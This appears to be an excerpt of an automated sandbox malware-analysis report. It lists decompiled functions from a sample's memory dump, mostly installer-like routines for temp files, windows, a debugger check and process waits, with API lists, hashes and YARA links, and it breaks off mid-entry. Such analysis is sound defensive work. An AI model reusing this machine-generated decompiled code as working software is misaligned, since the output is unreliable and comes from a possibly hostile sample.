                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                    • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                                    • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                                    • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 39%
                                                                    			E0060D3B4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _t60;
				signed int _t63;
				intOrPtr _t77;
				void* _t83;
				intOrPtr _t86;

				_t64 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t86);
				_push(0x60d4f1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E005C4EA4(_v8,  &_v24);
				E0040A5F0( &_v8, _v24);
				_t83 = 0x123456;
				_t63 = 0;
				_v17 = 0;
				do {
					_t83 = _t83 + 1;
					if(_t83 > 0x1ffffff) {
						_t83 = 0;
					}
					_t90 = 0x123456 - _t83;
					if(0x123456 == _t83) {
						_t9 =  &_v32; // 0x6b7447
						E005C567C(_v8, _t64, _t9, _t90);
						_t11 =  &_v32; // 0x6b7447
						E005CD508(0x5a,  &_v28,  *_t11);
						_t64 = _v28;
						E00429008(_v28, 1);
						E004098C4();
					}
					_push(_v8);
					_push("_iu");
					E0060D21C(_t83, _t63,  &_v36, 0x123456, _t83);
					_push(_v36);
					_push(L".tmp");
					E0040B550( &_v12, _t63, 4, 0x123456, _t83);
					if(E005C6880(_t90) == 0) {
						_t63 = 1;
						_v17 = E005C685C(_v12);
						if(_v17 != 0) {
							_t60 = CreateFileW(E0040B278(_v12), 0xc0000000, 0, 0, 2, 0x80, 0);
							_t63 = 0 | _t60 != 0xffffffff;
							if(1 != 0) {
								CloseHandle(_t60);
							}
						}
					}
				} while (_t63 == 0);
				E0040A5A8(_v16, _v12);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E0060D4F8);
				E0040A228( &_v36, 4);
				return E0040A228( &_v12, 2);
			}
















                                                                    0x0060d3b7
                                                                    0x0060d3b9
                                                                    0x0060d3ba
                                                                    0x0060d3bb
                                                                    0x0060d3bc
                                                                    0x0060d3bd
                                                                    0x0060d3be
                                                                    0x0060d3bf
                                                                    0x0060d3c0
                                                                    0x0060d3c4
                                                                    0x0060d3c7
                                                                    0x0060d3cd
                                                                    0x0060d3d4
                                                                    0x0060d3d5
                                                                    0x0060d3da
                                                                    0x0060d3dd
                                                                    0x0060d3e6
                                                                    0x0060d3f1
                                                                    0x0060d3fb
                                                                    0x0060d3fd
                                                                    0x0060d3ff
                                                                    0x0060d403
                                                                    0x0060d403
                                                                    0x0060d40a
                                                                    0x0060d40c
                                                                    0x0060d40c
                                                                    0x0060d40e
                                                                    0x0060d410
                                                                    0x0060d412
                                                                    0x0060d418
                                                                    0x0060d41d
                                                                    0x0060d427
                                                                    0x0060d42c
                                                                    0x0060d436
                                                                    0x0060d43b
                                                                    0x0060d43b
                                                                    0x0060d440
                                                                    0x0060d443
                                                                    0x0060d44d
                                                                    0x0060d452
                                                                    0x0060d455
                                                                    0x0060d462
                                                                    0x0060d471
                                                                    0x0060d473
                                                                    0x0060d47d
                                                                    0x0060d484
                                                                    0x0060d4a1
                                                                    0x0060d4a9
                                                                    0x0060d4ae
                                                                    0x0060d4b1
                                                                    0x0060d4b1
                                                                    0x0060d4ae
                                                                    0x0060d484
                                                                    0x0060d4b6
                                                                    0x0060d4c4
                                                                    0x0060d4cb
                                                                    0x0060d4ce
                                                                    0x0060d4d1
                                                                    0x0060d4de
                                                                    0x0060d4f0

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID: .tmp$Gtk$_iu
                                                                    • API String ID: 3498533004-1320520068
                                                                    • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                    • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                                    • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                    • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E006B8998(char __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t61;
				intOrPtr _t66;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				intOrPtr _t99;

				_t100 = __eflags;
				_t95 = __esi;
				_t94 = __edi;
				_t68 = __ebx;
				_t97 = _t98;
				_t99 = _t98 + 0xffffffdc;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				 *[fs:eax] = _t99;
				_t27 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t27, L"Uninstall", __eflags);
				_t30 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t30 + 0x188), 5);
				 *[fs:edx] = _t99;
				E006AF824();
				E005C745C( &_v20);
				E00424020(_v20);
				E005C6FB0(0, __ebx,  &_v24, __edi, __esi);
				E0040A5A8(0x6d68d0, _v24);
				E006B6C80(__ebx, __edi, __esi, _t100);
				_t44 =  *0x6d68d0; // 0x0
				E005C4F90(_t44, _t68,  &_v28, L".dat", _t94, _t95);
				E0040A5A8(0x6d68d4, _v28);
				_t48 =  *0x6d68d0; // 0x0
				E005C4F90(_t48, _t68,  &_v32, L".msg", _t94, _t95);
				E0040A5A8(0x6d68d8, _v32);
				_v8 = E005CBFB8(1, 1, 0, 2);
				 *[fs:eax] = _t99;
				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x6b8af0, _t97,  *[fs:edx], 0x6b8c15, _t97,  *[fs:eax], 0x6b8c4e, _t97, __edi, __esi, __ebx, _t96);
				E005CBF78(_v8, _v40 - 8);
				E005CBF50(_v8, 8,  &_v16);
				if(_v16 == 0x67734d49) {
					_t61 =  *0x6d68d0; // 0x0
					E005CD6BC(_t61, _t68, 1, _v12, _t94, _t95);
				} else {
					_t66 =  *0x6d68d8; // 0x0
					E005CD6BC(_t66, _t68, 1, 0, _t94, _t95);
				}
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E006B8AF7);
				return E00408444(_v8);
			}






















                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8998
                                                                    0x006b8999
                                                                    0x006b899b
                                                                    0x006b89a3
                                                                    0x006b89a6
                                                                    0x006b89a9
                                                                    0x006b89ac
                                                                    0x006b89ba
                                                                    0x006b89bd
                                                                    0x006b89c9
                                                                    0x006b89d0
                                                                    0x006b89de
                                                                    0x006b89ee
                                                                    0x006b89f1
                                                                    0x006b89f9
                                                                    0x006b8a01
                                                                    0x006b8a0b
                                                                    0x006b8a18
                                                                    0x006b8a1d
                                                                    0x006b8a2a
                                                                    0x006b8a2f
                                                                    0x006b8a3c
                                                                    0x006b8a49
                                                                    0x006b8a4e
                                                                    0x006b8a5b
                                                                    0x006b8a78
                                                                    0x006b8a86
                                                                    0x006b8a91
                                                                    0x006b8a9d
                                                                    0x006b8aad
                                                                    0x006b8ab9
                                                                    0x006b8ad0
                                                                    0x006b8ad5
                                                                    0x006b8abb
                                                                    0x006b8abf
                                                                    0x006b8ac4
                                                                    0x006b8ac4
                                                                    0x006b8adc
                                                                    0x006b8adf
                                                                    0x006b8ae2
                                                                    0x006b8aef

                                                                    APIs
                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                    • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                      • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                                      • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                    • API String ID: 3312786188-1660910688
                                                                    • Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                    • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                                    • Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                                    • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E006153AC(struct HWND__* __eax, signed char __edx, void* __ebp) {
				char _v16;
				signed char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				struct HWND__* _t14;
				void* _t21;
				intOrPtr* _t22;
				struct HWND__* _t28;
				void* _t29;
				signed char* _t31;

				_t31 =  &_v20;
				 *_t31 = __edx;
				_t28 = __eax;
				_t21 = SendMessageW(__eax, 0xb06, 0, 0);
				if(_t21 != 0x6020000) {
					_v28 = _t21;
					_v24 = 0;
					_v20 = 0x6020000;
					_v16 = 0;
					_t23 = L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)";
					E00429044(_t21, L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x6d62f8, _t28, 1,  &_v28);
					E004098C4();
				}
				 *0x6d62e4 = 1;
				 *0x6d62f4 = _t28;
				_t8 =  *0x615310; // 0x615368
				 *0x6d62f8 = E004785F8(E006158C4, _t8);
				if( *0x6d62f8 == 0) {
					E0060CD28(L"Failed to create DebugClientWnd", _t21);
				}
				_t29 = 4;
				_t22 =  *0x6cdb54; // 0x6cceb4
				do {
					E005C86E0( *0x6d62f8, _t23,  *_t22);
					_t22 = _t22 + 4;
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_t14 =  *0x6d62f4; // 0x0
				return SendMessageW(_t14, 0xb00,  *0x6d62f8,  *_t31 & 0x000000ff);
			}

















                                                                    0x006153af
                                                                    0x006153b2
                                                                    0x006153b5
                                                                    0x006153cb
                                                                    0x006153d3
                                                                    0x006153d5
                                                                    0x006153d9
                                                                    0x006153de
                                                                    0x006153e6
                                                                    0x006153f2
                                                                    0x006153fe
                                                                    0x00615403
                                                                    0x00615403
                                                                    0x00615408
                                                                    0x0061540f
                                                                    0x00615415
                                                                    0x00615425
                                                                    0x0061542a
                                                                    0x00615431
                                                                    0x00615431
                                                                    0x00615436
                                                                    0x0061543b
                                                                    0x00615441
                                                                    0x00615445
                                                                    0x0061544a
                                                                    0x0061544d
                                                                    0x0061544d
                                                                    0x0061545d
                                                                    0x0061546e

                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                                    • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                                    Strings
                                                                    • hSa, xrefs: 00615415
                                                                    • Failed to create DebugClientWnd, xrefs: 0061542C
                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                                    • API String ID: 3850602802-2905362044
                                                                    • Opcode ID: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                                    • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                                    • Opcode Fuzzy Hash: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                                    • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E00624AA4(HANDLE* __eax) {
				HANDLE* _v8;
				long _v12;
				intOrPtr* _t7;
				long _t11;
				intOrPtr _t27;
				void* _t30;

				_v8 = __eax;
				_push(_t30);
				_push(0x624b25);
				_push( *[fs:edx]);
				 *[fs:edx] = _t30 + 0xfffffff8;
				do {
					_t7 =  *0x6cdec4; // 0x6d579c
					E005B8704( *_t7);
					_t11 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0x4ff);
				} while (_t11 == 1);
				if(_t11 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				if(GetExitCodeProcess( *_v8,  &_v12) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00624B2C);
				return CloseHandle( *_v8);
			}









                                                                    0x00624aaa
                                                                    0x00624aaf
                                                                    0x00624ab0
                                                                    0x00624ab5
                                                                    0x00624ab8
                                                                    0x00624abb
                                                                    0x00624abb
                                                                    0x00624ac2
                                                                    0x00624ad6
                                                                    0x00624adb
                                                                    0x00624ae3
                                                                    0x00624aea
                                                                    0x00624aea
                                                                    0x00624b00
                                                                    0x00624b07
                                                                    0x00624b07
                                                                    0x00624b0e
                                                                    0x00624b11
                                                                    0x00624b14
                                                                    0x00624b24

                                                                    APIs
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                                    • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                                    • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                    • API String ID: 2573145106-3235461205
                                                                    • Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                    • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                                    • Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                    • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004070B0(signed int __eax, void* __edx) {
				short _v530;
				short _v1052;
				short _v1056;
				short _v1058;
				signed int _t20;
				void* _t24;
				WCHAR* _t25;

				_t25 =  &_v1052;
				_t24 = __edx;
				_t20 = __eax;
				if(__eax != 0) {
					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
					_v1058 = 0x3a;
					_v1056 = 0;
					GetCurrentDirectoryW(0x105,  &_v530);
					SetCurrentDirectoryW(_t25);
				}
				GetCurrentDirectoryW(0x105,  &_v1052);
				if(_t20 != 0) {
					SetCurrentDirectoryW( &_v530);
				}
				return E0040B318(_t24, 0x105,  &_v1052);
			}










                                                                    0x004070b2
                                                                    0x004070b8
                                                                    0x004070ba
                                                                    0x004070be
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x004070d3
                                                                    0x004070e7
                                                                    0x004070ed
                                                                    0x004070ed
                                                                    0x004070fc
                                                                    0x00407103
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x0040712a

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID: :
                                                                    • API String ID: 1611563598-336475711
                                                                    • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                    • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                    • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                    • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0059BDE0(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x80)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x78));
					if( *((intOrPtr*)(__eax + 0x78)) != 0) {
						return E0059BDE0(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0059BF18(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x70)) != 0) {
							L14:
							E0059BC9C(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x50))();
						}
						_t44 =  *0x59a1c4; // 0x59a21c
						if(E0040868C( *((intOrPtr*)(_t49 + 0x7c)), _t44) == 0 || GetMenuItemCount(E0059BF18(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0xbc));
							 *(_t49 + 0xbc) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}












                                                                    0x0059bde0
                                                                    0x0059bde4
                                                                    0x0059bdea
                                                                    0x0059bdf4
                                                                    0x0059bdf6
                                                                    0x00000000
                                                                    0x0059bdf6
                                                                    0x0059be02
                                                                    0x0059be07
                                                                    0x00000000
                                                                    0x0059be09
                                                                    0x0059be1b
                                                                    0x0059be20
                                                                    0x0059be24
                                                                    0x0059be29
                                                                    0x0059be32
                                                                    0x0059be3c
                                                                    0x0059be43
                                                                    0x0059be53
                                                                    0x0059be58
                                                                    0x0059be58
                                                                    0x0059be5a
                                                                    0x0059be5b
                                                                    0x0059be61
                                                                    0x0059be67
                                                                    0x0059bea2
                                                                    0x0059bea4
                                                                    0x0059bea9
                                                                    0x00000000
                                                                    0x0059beaf
                                                                    0x0059be6c
                                                                    0x0059be79
                                                                    0x00000000
                                                                    0x0059be8c
                                                                    0x0059be93
                                                                    0x0059be9a
                                                                    0x00000000
                                                                    0x0059be9a
                                                                    0x0059be79
                                                                    0x0059be61
                                                                    0x0059beb6

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
